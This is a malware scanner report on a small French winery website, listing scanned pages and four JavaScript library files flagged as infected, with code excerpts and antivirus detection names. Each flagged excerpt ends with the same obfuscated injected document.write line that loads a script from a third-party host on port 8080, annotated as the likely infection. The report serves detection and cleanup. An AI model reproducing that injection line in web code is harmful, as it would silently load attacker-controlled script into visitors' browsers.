
Malware Scanner report for tour-des-chenes.com

Malicious/Suspicious/Total urls checked
4/0/15
4 of the 15 checked URLs contain malicious code; all four are JavaScript files. See details below.
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK


Scanned pages/files

Request | Server response | Status
http://tour-des-chenes.com/
200 OK
Content-Length: 6438
Content-Type: text/html
clean
http://tour-des-chenes.com/appelation.htm
200 OK
Content-Length: 6169
Content-Type: text/html
clean
http://tour-des-chenes.com/Scripts/AC_RunActiveContent.js
200 OK
Content-Length: 3341
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

// Appends `ext` to `src`. When `src` contains a '?', the extension is placed
// immediately before the first '?' so that the query string stays at the end;
// the regex has no global flag, so only that first '?' is touched.
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}
function AC_Generateobj(objAttrs, params, embedAttrs)
{
var str = '<object ';
for (var i in objAttrs)
str += i + '="' + objAttrs[i] + '" ';
str += '>';
for (var i in params)
str += '<param name="' + i + '" value="' + params[i] + '" /> ';
str += '<embed ';
for (
... 2795 bytes are skipped ...
br/> case "id":
case "tabindex":
ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1];
break;
default:
ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1];
}
}
ret.objAttrs["classid"] = classid;
if (mimeType) ret.embedAttrs["type"] = mimeType;
return ret;
}


// NOTE(review): this statement follows the closing brace of the last function shown in the
// excerpt and is most likely what the scanner and the antivirus engines below are flagging.
// It uses document.write to make the browser load a script from a third-party host on
// port 8080. The tag name is split across string concatenation ('<s'+'cript', '</scr'+'ipt>'),
// which looks intended to get past simple "<script" string matching; confirm against a
// known-good copy of this file.
// The identical statement ends all four flagged files in this report. For cleanup, restore
// each file from a trusted source and establish how the files on the server were modified,
// rather than only deleting this line.
document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>');

Antivirus reports:

AntiVir
JS/Redir.jea
Avast
JS:Redirector-FA [Trj]
Ikarus
Trojan.JS.Redir
nProtect
Trojan.JS.Redirector.ADM
Emsisoft
Trojan.JS.Redirector.ADM (B)
Comodo
TrojWare.JS.Redirect.sst
Microsoft
Trojan:JS/Redirector.EV
MicroWorld-eScan
Trojan.JS.Redirector.ADM
Fortinet
JS/HackLoad.BBEL!tr
TotalDefense
JS/Redirector.BB
F-Secure
Trojan.JS.Redirector.ADM
Sophos
Mal/HappJS-A
GData
Trojan.JS.Redirector.ADM
ESET-NOD32
JS/TrojanDownloader.HackLoad.AE
BitDefender
Trojan.JS.Redirector.ADM

http://tour-des-chenes.com/vignoble.htm
200 OK
Content-Length: 4666
Content-Type: text/html
clean
http://tour-des-chenes.com/cepages.htm
200 OK
Content-Length: 6850
Content-Type: text/html
clean
http://tour-des-chenes.com/cuvees.htm
200 OK
Content-Length: 7252
Content-Type: text/html
clean
http://tour-des-chenes.com/temoignages.htm
200 OK
Content-Length: 4664
Content-Type: text/html
clean
http://tour-des-chenes.com/lightbox/js/prototype.js
200 OK
Content-Length: 47711
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

// Namespace object for the library; this copy reports Version '1.4.0'.
var Prototype = {
Version: '1.4.0',
// Regex source, kept as a string, that matches a script element and captures its body.
ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)',
// No-op function.
emptyFunction: function() {},
// Identity function: returns its argument unchanged.
K: function(x) {return x}
}
// Class.create() returns a constructor function; when that constructor is called it
// forwards all of its arguments to this.initialize.
var Class = {
create: function() {
return function() {
this.initialize.apply(this, arguments);
}
}
}
// Empty object; how it is used is not visible in this excerpt.
var Abstract = new Object();
Object.extend = function(destination, source) {
for (property in source) {
destination[property] = source[
... 3510 bytes are skipped ...
valueT = 0, valueL = 0;
do {
valueT += element.offsetTop || 0;
valueL += element.offsetLeft || 0;
if (element.offsetParent == document.body)
if (Element.getStyle(element, 'position') == 'absolute') break;
element = element.offsetParent;
} while (element);
return [valueL, valueT];
}
}

// NOTE(review): this line sits after the end of the library code shown in the excerpt and is
// most likely what the scanner flags. It writes a script tag that loads code from a
// third-party host on port 8080, with the tag name split across string concatenation,
// presumably to avoid plain "<script" string matching. The same statement ends every flagged
// file in this report, so compare each file with a known-good copy when cleaning up.
document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>');

Antivirus reports:

Qihoo-360
virus.html.url
Avast
JS:Illredir-CI [Trj]
Ad-Aware
Trojan.Redirector.JS.BZ
Ikarus
Trojan-Downloader.JS.HackLoad
nProtect
Trojan.Redirector.JS.BZ
Emsisoft
Trojan.Redirector.JS.BZ (B)
MicroWorld-eScan
Trojan.Redirector.JS.BZ
Tencent
Js.Trojan.Redirector.Gvo
Cyren
JS/Redir.OX
F-Secure
Trojan.Redirector.JS.BZ
VIPRE
Trojan-Clicker.HTML.RemoteScript (v)
F-Prot
JS/Redir.OX
AVG
JS/Redir
Sophos
Mal/HappJS-A
GData
Trojan.Redirector.JS.BZ
AVware
Trojan-Clicker.HTML.RemoteScript (v)
ESET-NOD32
JS/TrojanDownloader.HackLoad.AA
BitDefender
Trojan.Redirector.JS.BZ

http://tour-des-chenes.com/lightbox/js/scriptaculous.js?load=effects
200 OK
Content-Length: 2260
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var Scriptaculous = {
Version: '1.5.1',
require: function(libraryName) {
document.write('<script type="text/javascript" src="'+libraryName+'"></script>');
},
load: function() {
if((typeof Prototype=='undefined') ||
parseFloat(Prototype.Version.split(".")[0] + "." +
Prototype.Version.split(".")[1]) < 1.4)
throw("script.aculo.us requires the Prototype JavaScript framework >= 1.4.0");

... 161 bytes are skipped ...
ach( function(s) {
var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,'');
var includes = s.src.match(/\?.*load=([a-z,]*)/);
(includes ? includes[1] : 'builder,effects,dragdrop,controls,slider').split(',').each(
function(include) { Scriptaculous.require(path+include+'.js') });
});
}
}
// Runs the load function of the Scriptaculous object defined above.
Scriptaculous.load();

// NOTE(review): most likely the flagged line. The library's own require() earlier in this
// excerpt also uses document.write to emit a script tag, so that call alone is not the
// indicator. What sets this statement apart is the hard-coded third-party host on port 8080
// and the tag name split across string concatenation ('<s'+'cript'), presumably to avoid
// plain "<script" string matching. The same statement ends every flagged file in this report.
document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>');

Antivirus reports:

AntiVir
HTML/Rce.Gen3
Avast
HTML:Script-inf
nProtect
Trojan.JS.Redirector.AEY
K7AntiVirus
Trojan
Emsisoft
Trojan.JS.Redirector.AEY (B)
McAfee-GW-Edition
JS/Redirector.o
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Gamburl.E
TotalDefense
JS/Redirector!generic
McAfee
JS/Redirector.o
NANO-Antivirus
Trojan.Url.IframeB.zwzsb
F-Secure
Trojan.JS.Redirector.AEY
F-Prot
HTML/Linker.U
Sophos
Mal/Badsrc-C
GData
Trojan.JS.Redirector.AEY
Commtouch
HTML/Linker.U
ESET-NOD32
HTML/ScrInject.B.Gen
BitDefender
Trojan.JS.Redirector.AEY

http://tour-des-chenes.com/lightbox/js/lightbox.js
200 OK
Content-Length: 20141
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

// Image paths, sizing values and state for the lightbox, all declared as globals.
var fileLoadingImage = "../lightbox/images/loading.gif";
var fileBottomNavCloseImage = "../lightbox/images/close.gif";
var resizeSpeed = 7;
var borderSize = 10;
var imageArray = new Array;
var activeImage;
// Clamp resizeSpeed to the range 1..10 before deriving the duration from it.
if(resizeSpeed > 10){ resizeSpeed = 10;}
if(resizeSpeed < 1){ resizeSpeed = 1;}
// Assigned without `var`, so this creates an implicit global. A higher resizeSpeed
// yields a smaller resizeDuration.
resizeDuration = (11 - resizeSpeed) * 0.15;
Object.extend(Element, {
getWidth: function(element) {
element = $(element);
return element.offsetWid
... 3560 bytes are skipped ...
ibility = "hidden";
}
}
// Blocks until the clock has passed the current time plus numberMillis milliseconds.
// This is a busy-wait: the loop keeps creating Date objects and comparing timestamps,
// so no other script on the page runs while it spins.
function pause(numberMillis) {
var now = new Date();
var exitTime = now.getTime() + numberMillis;
while (true) {
now = new Date();
if (now.getTime() > exitTime)
return;
}
}
// Creates the Lightbox instance. myLightbox is assigned without `var`, so it becomes a global.
function initLightbox() { myLightbox = new Lightbox(); }
// Passes initLightbox to Event.observe for the window 'load' event.
Event.observe(window, 'load', initLightbox, false);

// NOTE(review): this line sits after the end of the library code shown in the excerpt and is
// most likely what the scanner flags. It writes a script tag that loads code from a
// third-party host on port 8080, with the tag name split across string concatenation,
// presumably to avoid plain "<script" string matching. Several engines below label this file
// as an iframe injector, but the visible excerpt shows only this remote script include.
// Whether an iframe is in the skipped bytes or is produced by the remote script cannot be
// told from here.
document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>');

Antivirus reports:

AntiVir
JS/iFrame.US
Avast
JS:Iframe-AEL [Trj]
Ad-Aware
Trojan.JS.Iframe.CMG
Bkav
MW.Clodd78.Trojan.8ba2
Ikarus
Virus.HTML.Framer
nProtect
Trojan.JS.Iframe.CMG
TrendMicro-HouseCall
TROJ_GEN.F47V1121
Comodo
TrojWare.JS.Iframe.CP
Emsisoft
Trojan.JS.Iframe.CMG (B)
Microsoft
Exploit:HTML/IframeRef.EP
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
Trojan.JS.Iframe.CMG
Fortinet
JS/Iframe.CMG!tr
NANO-Antivirus
Trojan.Url.IframeB.bboxvt
F-Secure
Trojan.JS.Iframe.CMG
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
Iframe.RZ
GData
Trojan.JS.Iframe.CMG
Commtouch
IFrame.gen
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.JS.Iframe.CMG

http://tour-des-chenes.com/batiment.htm
200 OK
Content-Length: 6241
Content-Type: text/html
clean
http://tour-des-chenes.com/salles.htm
200 OK
Content-Length: 5725
Content-Type: text/html
clean
http://tour-des-chenes.com/cave.htm
200 OK
Content-Length: 5953
Content-Type: text/html
clean
http://tour-des-chenes.com/jardins.htm
200 OK
Content-Length: 5707
Content-Type: text/html
clean
http://tour-des-chenes.com/services_r.htm
200 OK
Content-Length: 5940
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: tour-des-chenes.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 14:03:40 GMT
Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8c
Content-Language: fr
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: PHP/5.2.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: tour-des-chenes.com
Referer: http://www.google.com/search?q=tour-des-chenes.com

Result:
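The result is similar to the first query. There are no suspicious redirects found. Note that this test compares only the server's HTTP responses to the two requests; the script injection reported in the four JavaScript files runs in the visitor's browser and is outside what this check covers.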

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=tour-des-chenes.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tour-des-chenes.com/

Result: tour-des-chenes.com is not infected or malware details are not published yet.